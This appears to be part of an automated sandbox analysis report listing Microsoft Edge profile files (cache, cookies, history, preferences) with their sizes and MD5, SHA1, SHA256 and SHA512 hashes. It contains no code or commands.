379a0809575953d0cc51ac86e2a91c8ff20901cf

SHA256
f29bd44ad5f35ccfaebe5adf6ce315ce1a4b50016a3a1cb69fbd28796bd7dd60

SHA512
d52ce6474e2e3e98af43232d8124121648e0c7614cd60028a02fd8dd443d22470828e680d9b5fe455bb3baf08fb68950ed385e674663aad2bb367b0b5d5bbb46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000051

Filesize
20KB

MD5
87e8230a9ca3f0c5ccfa56f70276e2f2

SHA1
eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7

SHA256
e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9

SHA512
37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000058

Filesize
20KB

MD5
6408c37d09ecb7370b4d61ea51a15ad0

SHA1
8fa447851c7db6c2a4e20a13d769ed926daee5d5

SHA256
38c4bb35d2dc312b0e82bf8c5098495fd12d73029dedb6014c8f3ead635e641e

SHA512
5436d6204625fcc424989776d5ceb7fbbe286bd37bf077967289ce336ecea0e1db85f064d51d4a18877cd96be0d20557c682bbf2ccc6e34d6e096557aa357311

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005d

Filesize
67KB

MD5
bcfda9afc202574572f0247968812014

SHA1
80f8af2d5d2f978a3969a56256aace20e893fb3f

SHA256
7c970cd163690addf4a69faf5aea65e7f083ca549f75a66d04a73cb793a00f91

SHA512
508ca6011abb2ec4345c3b80bd89979151fee0a0de851f69b7aa06e69c89f6d8c3b6144f2f4715112c896c5b8a3e3e9cd49b05c9b507602d7f0d6b10061b17bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000076

Filesize
29KB

MD5
4c8061460f5842fa384d1a4a08d8f02f

SHA1
539b34e3eb561891fe15dfa9d5b035de71691509

SHA256
b8dc49f9000a2bedb7dac674ea59d0737d354f95f1acdaeda2c79aba989e219d

SHA512
c184bfd146dbed88f98a1a92f001da6fbd9b0bfe5f9873f78915bde24c482e6cb688b7a94a2d1beb0735734112fd8e2c3b54172a81e804e8e2612312101eae5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
89824a342b84a44aa42f74b73cf09552

SHA1
8a8ec6f61f655930fd5f4716002f0adbaf926df3

SHA256
09d11d7925ab0457c4c015a1369fc811ca4e5f248f356252d0a4f71f00128e37

SHA512
20a666d16e744154c165349976f1b41d942eb65cd8b0c46a2dc712e5da47867a179ed391ca433df9d7b96d9b2b98d5e06827a90fadab61ebe7ee8f368df05dea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
4bf723de843862597b8f5fed6993454f

SHA1
7146294c1169ddbdfe6926db553c14ff6c37421e

SHA256
4ed1bfc5a39384a079ad819e9626a7a6edb1c7be3a1b9033a706b6d356c6ec5a

SHA512
111bac5edbc13a109cdff59d9f4e4929f7b0546bd9812dce9566898db3665ee2c57f9e6c183f9ee2035649b83cdd09ab49d6f37846327085105fd649ee38589d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
408B

MD5
7f373d57ef1c1d7b9edecc67c388c754

SHA1
fa0bbe0b170beda62aa05f1109e7523eaa508d32

SHA256
26831cd7ea25655467241b6dca74170546a35fe34d03eee835c6ea3591db17ab

SHA512
bb92726fc2980408c46facc6ab96f5efeb63e17f65e44a3066d2ab736ef535458ee39e3fb905a7be57ac9e0e53a72be3bf3d85d36a6f27e861c8718056e315c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
672B

MD5
7ed1ba35d76dc8f77c51de6e56958f35

SHA1
428c11ec473a9503d286c0351c96a9d3dbc05e13

SHA256
6cb3e2ca0baf183954a908a02d4f3c024c5915ce4f4334a74424a1511f7d959d

SHA512
272877854114097b9d5b58945aaf8b2ef5ad29ed521bd573d8b4b255ff2d342f2f8a2a60c58a9e623d8583605f4327bf9eb79b27f200427022794b31767e76a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
624B

MD5
b2cc9374b3f568a0235bf68060932301

SHA1
a9ecbb4f653bdc1e7e2c8d80ef0b215ff14d055d

SHA256
9d971f840fb46c4d41b0e6b692169bb59f4a60432efaa1ef94a14f0e6b43fdcb

SHA512
5ab249f80fa7f19efb20c53d2fc912ac8c82d5a22d2f303a231ad0ccb298d5e6223ecf5fa8356c8f66e86979d654027dc8ff414181e0d8be6dc2ef0f6445137a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir\the-real-index

Filesize
48B

MD5
433bee9b39428a4499a4a4cc6708c056

SHA1
7b157b1ea8bfe6beb21feeedb8d168702f24fbb3

SHA256
3b8e012995c6d21c7eeebc26bbea3258a36c7717777d48589560ab33d4d084b0

SHA512
14504d72822d8de103232cbc5e2f870b99395af1d84416cbc051dab5986b191fbabec5686a97b9e1540d760290f9beb541b6112d8f7530aceaa462503ccfb771

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

Filesize
24KB

MD5
587deda94e028e766a7cfef9945e1b71

SHA1
1a98fb8b817f5fe4c432aae567e3c984d5d0df66

SHA256
01e3d9f345058f77e2f2600c0e0d1ac9618a2d08d53f6afa43c65b3352712c06

SHA512
66036e37eeceb11f09d2716f57f494b6e3d3f13c3a037c3ab7a4b454d555aee0552319e2a7b18e1c0a7dd9bd3a2043ebf095912b67c1c3b3859aca0ac82fc59d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\index

Filesize
256KB

MD5
43d04becff3a8c9d9b642215acf0281f

SHA1
3ceb0d8f418287c17791eddd625211a5b233410c

SHA256
8d450253f03c082561398a5dfcca471e7c8550a5da660254712014ac0038efcc

SHA512
598fc4c31597fb6f200ed6e9381c0e9667e965f75a589df04cdafcb027292dd8038b220bec5fe42505e9cf38a0579e24e2d3b1db04f5af3838035a11ed351b3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
151a40c76c009664f286927b46398ec1

SHA1
6d5b573311efd1f65b22b5bae6a96a51765e941e

SHA256
53837ce8d014598746bb6f8caae97e31944b2093001d05ef5ad95c7d61eb92ff

SHA512
8f87bd61a5c396108efd5463f1a7e7aa8241a1ae15cd9587dc7f9797baae291d6f355cc2ecd2d6546f8906c16c41d68ab51a01d3bebb3f9fdad97a32b8fe1579

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

Filesize
914B

MD5
34f1eb1c92d67d3c4d31e19ec5b71cb2

SHA1
33ca3d53a268ea386158184df0c0ca5b4568fbb2

SHA256
e224ac013332eacbadfc7ca40c0e928db800eb2b4d0602fd3e88c87bc42becbf

SHA512
645d7f6d67bd2ea4cbf3a5ad05e156decef4d99143e6a2048447dcf68a36d26125b18741e2204c9607d82a71e1833c30de690705ae6f6ff0f0228912eaf27bba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
293B

MD5
55c60c4bd7923a98bd85007add3f4ee6

SHA1
22cfb4aca5fb5113b8b09b083fed5361f8ae878d

SHA256
fc211cc46e54a48e4eeef2a031f581a87b5e18f2069d1e684fde138394e12b14

SHA512
0ff3adff8440ede166c1eaf73db431c3d5abc9b6c627a59a5b74f2afa6cb5027d39ac062db8e6edf158c234a87893ed1eabab757ec3917d365e68087da1d4ddf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
22KB

MD5
87a1b74b76b56ac9820308e137b251b4

SHA1
bc78388dc756527d2dd9c5adc4ae30e6ba563003

SHA256
8a7a7e7928d08789ca7125c7b08a0e76c868ff1f00bb9279b52a989f19881224

SHA512
e61a6bc8f700bb8a772655a4c9cfe5c0325493a18f678f3ba7f8d474bf0450dd93a339826cccaf61832401b34e7293355d0182f8b8e597d51c33c05960ed90ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
09f5ba227251d3a31281b3e85e4e0b7e

SHA1
514a35d25fa5d1cfd80cdd65fba2000073750618

SHA256
257ee84ca35971db50f932be7a40e2aaf3090556e771ae42b1423b0d3c5f7dca

SHA512
e721e41a615c5d755f925f1d184163dcfcf2bada2dadcb02990467711fc66001f84b9e524f97aa7bd008960975f89ad582f195651f4a13662697e44f5dd42acb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
554B

MD5
e482e6315aa79bcb0e9fdea32b163d59

SHA1
10f357e77b2f0f0ba26a8cdf79149de50c0439b6

SHA256
a10b28d4e294466b9d98c25c3d7253361c429fb6e5e5de978857aedaec28f2ed

SHA512
94447e080be0be8db2311c546a561c000a85d9d3f43c9b255325e9ff2443f63102978e130ae56825db9bee6638816d9ef15930504cf60dde1a2f7b6cb09483aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
25KB

MD5
068a18316c55fb3935f0fab80b3d1c2f

SHA1
fd0cfb6ef470fed972f8846c2e83afabcf3b6cac

SHA256
423a4bf5dacd29e1d45a3d8a5c708717374ab30b3fbc911e96f85b7ba0d1820e

SHA512
3719a0312ee387c89fd43bdea9a0c627a6bc4b6c6ee4398bdbab31778ea3babea6bd94164ffcc4a6d7e950660d35f8855640924dea80ea9477706391e5d7a246

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
0006587f3a5ac7782635979541fa24f0

SHA1
ea2db849f2f9421234283cd89fdcdcde369ad638

SHA256
8a3cb22546ea2dae2745946081de8e1628a01c59ec8bc11a981c2de4aafc0900

SHA512
71007f8ff194f399d84f602a5c74726262e97a6da04f96114f091c9df5d1a9a0c7abf8fe007e261faaa1f0088b7a18ac3b4a72d56b25bfc890c529d61c7c3fa9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
3d3186bd29ea88cf9e55a89824d4753c

SHA1
ba2f35553cb7d7902bf9c2c71a335f04f8f599de

SHA256
bfbe9f5259e33ead22257f20d60dbd16ac2ab8add03922a9405db241daf15578

SHA512
c874b3ec50267cd2853114d4ce4100f9a35440bca7c4aa94aa97ee1834b050ca11855ba383e53932591d2712023d0252c73ccf29c3b00265466b8f69e9b329bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
748a3b0cf39e4c4547814a8de72cb820

SHA1
6bc233da6c764b7e76472a481e86ffdaac6b3b49

SHA256
4783f066c071a6e814259a2d336465f65ca533f77d9e0641eb28fe277141652b

SHA512
2bfd1c2e57607c082833e80cc90cb2e830a25f82b40539e79671aebda7bf44c702094ee6fea2c65aa04de3eb8e8a2e38499029f104cf3968f72925a323fbbff0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
fa835b9a745d7c1ef41ac1db3c7d364e

SHA1
eae92130b2238fb720ccdcf08e3baf2d684410a2

SHA256
73636565991c72b84edc8231cd2acd0e1b1cdc5219cf0c85a804a579e2c69536

SHA512
fe96d8a1036871ecc232f247a5bf3772e4ea5b4acad5e08d91952c015372e24a191aeabc94ac9e6ec647135d109ee7e53c9f1b442bab2bde730716f8f633391e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
5a45d688a90a11253cc816e9f9f8a3aa

SHA1
8de8c73110b081c60a1933707f68bb882d0ea2ba

SHA256
a67bc06051e93c34c87fe3ebfc3f76d6d67317b78e660166a1872413c0e83502

SHA512
52848c16b8191abdcd5fb203039f8795f156f9baa46ae1a4621606457833623107b3561e04a228749c44556dfd34958b960a9bc94176ba149325cb1b4797de01

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
20KB

MD5
7f1d32ed227e3514f3e4e6713577bcf7

SHA1
e8c8db224cec173989eacd93b29c6ce6b633d0fa

SHA256
883c5d55dba426329e05268083c042f05aab8641faa15746eb19f3f244d92afc

SHA512
c24c069e95fade12574369689ebb3acf8b610d99f38f8354b881e2d35491c12b0cbf27ec5543b296d5101d006176b86911db33555dbbca53d08be53578095217

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
86e77ddee9e36da592843bfd5c198970

SHA1
d49abc16f37101cdff4b456ef05a50b52d86d8f3

SHA256
aa1bb7a1fbc1cdbc9669d3fa66899839806f7f9e4f67119a16a30f37a86a07e4

SHA512
d970190b83688821184fce51e61cf2f7346afdc03103b4520072a3a36d7da3ddb82e4f0d8c0e84baec7c98fe2cada1915a14ea5ee54af90ae544d16d7b84ac18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
fe6cd0f70e62ea710d4e22e00ffaf178

SHA1
8a869bc175032b4d5753c7f21845242a29a4ae13

SHA256
af3337781a1f974329912710a9a1833459528334c2987c2f25b5b55602b7de5f

SHA512
ee29911e9b86a5bec4a6b7fda92b23293aea28c31c8dbe094a38e88b298cf81c4f36a77a8851b7c56491b50edab9468f7552d4d251d2bd5a1d3a65372520efcc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
6b8fbfa30cdefc792b98845e13c36fd6

SHA1
5cbe807d0b420e1ccb823b4fa6e7f80cc520613f

SHA256
264db8fb09dac90087601d598a122e0741f38d7f925cdf50c679503cac1932b9

SHA512
6474eca933ef480fab440b3e5f3ed78ec364c7f2ddf7970d96e84d8a0875eba82e2f19aff11b0bf7621adb7484c52af2b6c398ab704d605a20154df1f7ff9647

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
bdae56c0bc9265054541416d8cb218e8

SHA1
4294b08a2dac2329479cf85fd563cc0b2efea3fb

SHA256
816d370219b8f727db91b2bec490b2274edc76af7f607dee38fd7e63e740c68e

SHA512
581b08c3f1e8693a6be73e08a6ddd63dfc45e419ca92e9e7b7f2ebd095d20d8ccb0a899ff74242b6f04f0017657c40efe1a75e3d1289275bf581b6f9bb834150

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
e507e8bff18ad759a7edd096d0e7e1d1

SHA1
d467c9c47aa95f7300a8c37d136cc5b3705ebe44

SHA256
edc32650055f147aef4bc5fa9905d37773eda9bd13c6eed7be4b729ab0c7d085

SHA512
3e3779428615af06bd794495501f9dc68f5673fb887e450a65ed18f4947066d76edbc9253b1f12c9963a6cf8a9936074edef8f5da433616e6f8812a27ff4b960

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
e65185e4b0400ba1a309e10322eee5ff

SHA1
3d7f7b147dbfe79e63c8d2f221864b6c00df53ed

SHA256
5ae3e59d8da49e66fa424af1da2836a2ffcaa690dadcd9a3e4db6356e32d09ac

SHA512
48309fea5169ba18f8e5557f55f905f5dbcdcd0f6384d2d0507bbb58c2218860a8e143229aebda19bfa7538b720ccb162374fa80a483cdd8f61a9923f62d4942

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
12KB

MD5
ed35d7e1a43c862d4796c1d1003b67ea

SHA1
b252d9064e8d87db0017ef56b3957e64efc59440

SHA256
f13548fbedc4a34b4c3fca34e4bfb78817bafec66ba5934b70abcb4f89f59939

SHA512
174a3b1d0703d0efb5b67f14261d59adf81a0b6d75ccd88eebbe21f5df0648b2f1d4105bb298b23af2a04a2f0140b4c21b5d68a5b5c7524640906ae8e092053e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
17KB

MD5
57356a35fc5802e5876be31b8a2e92a3

SHA1
31a04a9781ad7b91d35c03fc210906782c885dc7

SHA256
1891a8baae44fee31c54e95e82fff47e12040caac283d4d5ad795675bbc995f2

SHA512
20a2c0e30a6f5da559de76aa0e8e55c29d5f2fb7fe3be114488b51d75239ff119c6b29f16e1e6ccb8d826875bcc94077160313ee74048d2dd6f43bbd251d0bd0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
3ea678d130c1a33ed0e302f849a15680

SHA1
b71256a26632b53c78112c2d6a9beb1ed8c2a9bb

SHA256
b9ac25ce29c8e3ad1dbbaf066d9a5f7ada7a76adb915d0e0e0f944790b669af7

SHA512
a666eb8da7bd4faeaf235633c4fc1b92801af089ad91c3ddb2b38977a5e5e193945bf4fe59f4a17b22c109f0079d903d31e7829635830bb7d742d85b47fa84de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
20KB

MD5
805baa41d0c331bea624b5725de61b8b

SHA1
11ccc60225805cd39234c470a12129fae8cc640a

SHA256
fae885a793ee115d210e131a58cb523585dfde23ba6b19c5a259e8bb40a27c2c

SHA512
b9f1e3741ea7edf95158a7c54bdc2a3bffd53f9c80611014aaaefa62b2824753fc0965f369e5c8db28890859331de9b8c76029c2950a3ee9a9b5637bde8c0c0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
7d187ebadf31e2decb3863dc098f7728

SHA1
e5ffa578652468aa9e46d30a12d6c5698fc571d5

SHA256
2be180e8f75122a6e277d802769e8b9f44df753a4b59a233fb53d7a3a3f5c934

SHA512
7a428e9e974a48b975840a37d642d146df7795072b2efeeea52fce08435fde14b5cc17f4b4b04a9c5b96d1f90bb41e446d6da13347f453e0f3fa14e5c397b2d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
809e9541816030225b2e7490c622ed07

SHA1
3e45f4b4296c9282879501970ab95de989174ceb

SHA256
4f085f22c9c5feb6099beff52bdd99ace24381fe6c5f8cead6500e3bce5f9664

SHA512
5a9dd970b185cdb339acaffbb298d352a825b22db520d81b4ac2538251102360c4bbbf015653481491c62b9216f3e4ede48bc2db415850c3f7af02a3dffcda6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
8a4e7a6e87a945cb8b7f7ed91b379206

SHA1
3067771725170fda0dc0fcb750cc2cf936853654

SHA256
37a95572c674c6751d0e622cdfe63a0f25ddd4980d22fa7e640381f130317e2b

SHA512
26245028a2d1392e1e87c75cb2fffa2aa3ee7a9632787a008ecbdb0795f718325a86e1b769cafbe8d2c3dd225d60909aa1453f262571c871f553e572fff6a732

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
20KB

MD5
116f791df49562442c4804c781c3da50

SHA1
36081ef646ace6c0b0135987a25ff7d1d2e07d5b

SHA256
2f741c8f9cad4e724ee908e0f5292552ea4ff48146526b2ec40f97c526028f12

SHA512
220cf291ef8c47631b78a31470c96626566fd009ef8543bafcbb4c07002b7d46971f8e1356748eb64827358ce8dd7bc80c23b4acce432a203059a65e3f56d17f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
ff5dd20177add5f2fb07a017c096ccce

SHA1
7afe60457ca44419c3421847c4202a50fd4b80a8

SHA256
0e18c1f1f59aefdb789413aefaeaa005421e9369195f7c35929008ec30b50cb0

SHA512
3bbbb7e4af49e8a92b5dba457567a249db23b50a1b4a79c33bc38a14e5dc4ae9dbf480b6f42abfd3da28af57c06aeaf4b0b7f3da39b712ca49981c8c7973c77a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
fed028b04d20c185974cbf26aec71dd1

SHA1
2ba76ba7145babffb33e4530fee1399414625c71

SHA256
70b868b1927fe3fc6541495036100b707f75829535ee7472f4de7590fca1e39e

SHA512
b25fb1646b84e0b5aa73fa32573a2653694e56f984670e3ede624942b4ca0ad67f0a68a131c3c1a49de4a82eeb76201697e9685c88735a48e3259a38ae1290de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
8bbb70b63ea38955801783c83b928cf0

SHA1
91e76aa432aa9b323f7f8efb7dc94fe0b9587496

SHA256
e31be9b1110c9d3f71b40293c8f3d21fbdb1d53910d91dad2ed1f29c363102cb

SHA512
1172db8453c8902fe6ab8e417ae44da691b72e8e05a50c85d5bda1ae3cd6b54407b1393d9707cd152bc37ad56b1c380ef23dae445f8f27e35844f6233132804c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8b1151d795a1350461b56b70a27da5988e08486f\index.txt

Filesize
86B

MD5
c087a5461c5322372e9290e92f502ef4

SHA1
0da066bfd1f703d4756d6c030a8cf02d4a8c033b

SHA256
b2e4796a85e22a58b82d9f46924bc1e0882e8e9966db3025deebf5545a032535

SHA512
0aac4723547d5e4893bb3fab253b1547d55f32d7ba0808842620436b5e1f20e580667138cf6709520f7a9a29e1e411cce276ac5b8c9be985cfe2870f9c7b3fcf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8b1151d795a1350461b56b70a27da5988e08486f\index.txt~RFe63572e.TMP

Filesize
93B

MD5
735906b3d27c473994963bdcf71f4057

SHA1
760a2a99d217bc397646ed9ab12ea4e8f4bd0b21

SHA256
a36f92f83171c49674e41e2a566a7fbefbc8bfc7d4b29486b00e6f14fd72243c

SHA512
41f0ba547781a0c4b23efc36546d1b1cd7a9ed9771438e0ac311aa2184394513304801e96aadf42be9213930592de1ff7741311ade4f9fbefad7bb04f16962ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
77fc8b1bf61d79cb14e7d07610cbb69e

SHA1
078767b29411565054dc5225c7985a60d47bad68

SHA256
9e8b68f0887a7557ae5fcee9b0b099da439e53dd9d4572950d9d238e212ba5cb

SHA512
382ca039d31741a1c33373334f324a4afc7f453bec6cd922b89f0c39946f0abefcd780b21d4681665991f84b55ece088bffba58d830e7ec4f6a03416eec1431d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe6356ef.TMP

Filesize
48B

MD5
15205ed33a9fc9aa43f73622062cd724

SHA1
4cbd32f56e04605d38e188c0a073d6e96ca5fb34

SHA256
36446f2c9359b311b58e28e04f930f4404ae7bd7e93db85bb84407c66d053d46

SHA512
a941e73176ffe0eec97318fd9aaf4c8a5bfe0534f20ce5027e0252bfac03637ed1e09f57a360a2251702084634d9d9101ffd7ed5e78d133b4b6f41be595f136c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13381585015958234

Filesize
3KB

MD5
622d2dffd4da746da020f11c050c7bf0

SHA1
9493f30fda3669ae27e37e9e223068271ae2f417

SHA256
8f21bb21190d8440dbb90f2144e170e59d35c2deec304a64a3877367d53cfecb

SHA512
78115111fb4ee1b2ca78042753bb733e708e737afe20bbc975cfd72b6eb3f0d39c00c1e242885139a81f97267163c54ba330d8b542a77806fd5b7f25a7778711

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log

Filesize
112B

MD5
a1bd5744c069085261105a5cfb9f0345

SHA1
23a923e648ee145954911fc4b1cccb021ff916d3

SHA256
0c29ce32d5f9b2b96073dd2492cc7b729b4bb73ce6829a9fb66b386dd4243f97

SHA512
0b1e33e2d18153bd6e71a516323f0bcc9e557708f28aac0bb87f51b5c4d3f6408ee5598984c0fdbf7847cd84ab957c401753a83b1ef09b997e0a952e412c3ef0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
347B

MD5
d3d58e2b77093a10d58e68b258bc9629

SHA1
32ec5f0f3daa4a490e47c5724675de521b082e0e

SHA256
2cffa41c2041c2a99481a24b56fc38f383987d7427a39681eb1362e67a0eb5df

SHA512
fc7995142669fe4624fd5158440adfea2787c880385ce7b1c6a1f22d4079f9afe3466eb1b7d5c8bdb7017b2806991af6b838374acd3d113264b5ec6330757287

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
326B

MD5
1908084a2b49291a7903654b1dfc2218

SHA1
f6634dd703dde4d17a522d37564deb4682229d36

SHA256
b351d6b0d8616ddaad9b0608d12cf46fa1c51a3f7abfc6e77f6593a76f420e61

SHA512
437dc704c7fac934362c126d07bdb7788c02adf16fca5d4b2aa58e4bcda6c0ad22a262ebceea2bb8101a6fe61545dee9be9e61d439e441e2cc2cf8c54c071d45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Top Sites

Filesize
20KB

MD5
f44dc73f9788d3313e3e25140002587c

SHA1
5aec4edc356bc673cba64ff31148b934a41d44c4

SHA256
2002c1e5693dd638d840bb9fb04d765482d06ba3106623ce90f6e8e42067a983

SHA512
e556e3c32c0bc142b08e5c479bf31b6101c9200896dd7fcd74fdd39b2daeac8f6dc9ba4f09f3c6715998015af7317211082d9c811e5f9e32493c9ecd888875d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
27c282e67d839bcbdb79a06601351952

SHA1
8ae7b9403131509511c6d2726247c621a6267a35

SHA256
40d1233e7ccfcf723fb170fecd0fd39d1a5ebfc89c87ac093d8cbc470c91ea36

SHA512
6c472a489d536dac02ea5230bd4cfd28696a6d43aea61bb3f1197cad6801dfc567153fa52a0b7749004699e0f293007ff2b5898cefafc1e09f2acf7f1fc80601

Download Submit
